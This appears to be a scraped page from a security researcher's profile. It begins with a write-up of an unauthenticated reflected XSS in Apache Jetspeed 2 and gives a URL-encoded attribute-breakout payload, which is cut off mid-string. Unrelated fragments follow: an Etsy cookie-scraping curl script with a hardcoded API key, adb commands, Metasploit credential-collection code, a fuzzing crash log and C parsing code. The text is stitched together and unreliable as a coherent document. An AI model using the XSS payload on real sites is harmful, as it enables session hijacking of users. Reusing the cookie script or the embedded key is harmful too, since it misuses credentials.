Brandon Perry brandonprry

During a recent pentest, we came across the Apache Jetspeed 2 HTTP server. After a few hours of testing, I realised that the web application was vulnerable to an unauthenticated reflected XSS attack. However, I was limited, as I could not use < or > in the URL, as Jetspeed would return a 400 Bad Request HTTP response.

I could break out of an attribute that was storing the URL with a double-quote ("), though, so I could control the attributes on a random element. A specially crafted URL could define a style attribute making the arbitrary HTML element take up the entire page, then an onmouseover attribute could execute random javascript. I ended up with a generic URL that looked like this (URL encoded):

http://192.168.0.7:8080/jetspeed/portal/fdsa%22%20%73%74%79%6c%65%3d%22%70%61%64%64%69%6e%67%2d%74%6f%70%3a%35%30%30%30%70%78%3b%64%69%73%70%6c%61%79%3a%62%6c%6f%63%6b%3b%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%3b%74%6f%70%3a%30%3b%6c%65%66%74%3a%30%3b%22%20%6f%6e%6d%6f%75%73%65%6f%76%65%72%3d%22%6a%61

	#export https_proxy=http://127.0.0.1:8081

	USER=''
	PASS=''
	KEY="bd516a32ff7db81c4a991acfc5656da3" #not secret
	TALENT="967951"
	VERSION="48"


	rm /tmp/fdsa

	COOKIE='use alert(document.cookie) in the JS Console to get your current Etsy cookie. Put the entire cookie string value here.'

	CONTEXT=`curl 'https://www.etsy.com/your/shops/me/dashboard?ref=hdr-mcpa' \
	-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' \
	-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8' \
	-H 'Accept-Language: en-US,en;q=0.5' \
	-H 'Referer: https://www.etsy.com/developers/your-apps' \
	-H 'Connection: keep-alive' \
	-b "$COOKIE" \
	-H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-User: ?1' -H 'Priority: u=0, i' -H 'TE: trailers' \| grep Etsy.Context`

	Turn on debugging.

	Still install sshd. File transfer over adb push/pull is too slow.

	#Disable Sound
	$ adb shell input keyevent 164

	$ adb shell svc power stayon true

	$ adb tcpip 4321 #Enable adb over wifi.

	repeat
	tell application "System Events" to key code (random number from 0 to 44)
	delay 8
	end repeat

	cred_collection = ::Metasploit::Framework::CredentialCollection.new(
	user_file: datastore['USER_FILE'],
	username: datastore['USERNAME'],
	blank_passwords: true
	)

	bperry@ubuntu:~/tmp$ DYNINSTAPI_RT_LIB=./dyninst-9.2.0/build/dyninstAPI_RT/libdyninstAPI_RT.so LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH ./afl-dyninst -i fisimple -o fi_inst -l libsc_fi.so -d
	Skipping library: libAflDyninst.so
	Skipping library: crtstuff.c
	Skipping library: libAflDyninst.cpp
	Instrumenting module: fisimple
	Instrumenting module: crtstuff.c
	Skipping library: DEFAULT_MODULE
	Instrumenting module: libsc_fi.so
	Segmentation fault
	bperry@ubuntu:~/tmp$

	for( j = 0; j < n->classname_len && j<9; j++)
	kv[j] = b[j*2];

	kv[8] = 0;
	sscanf( kv, "%x", (unsigned int)( &key[i4] ) );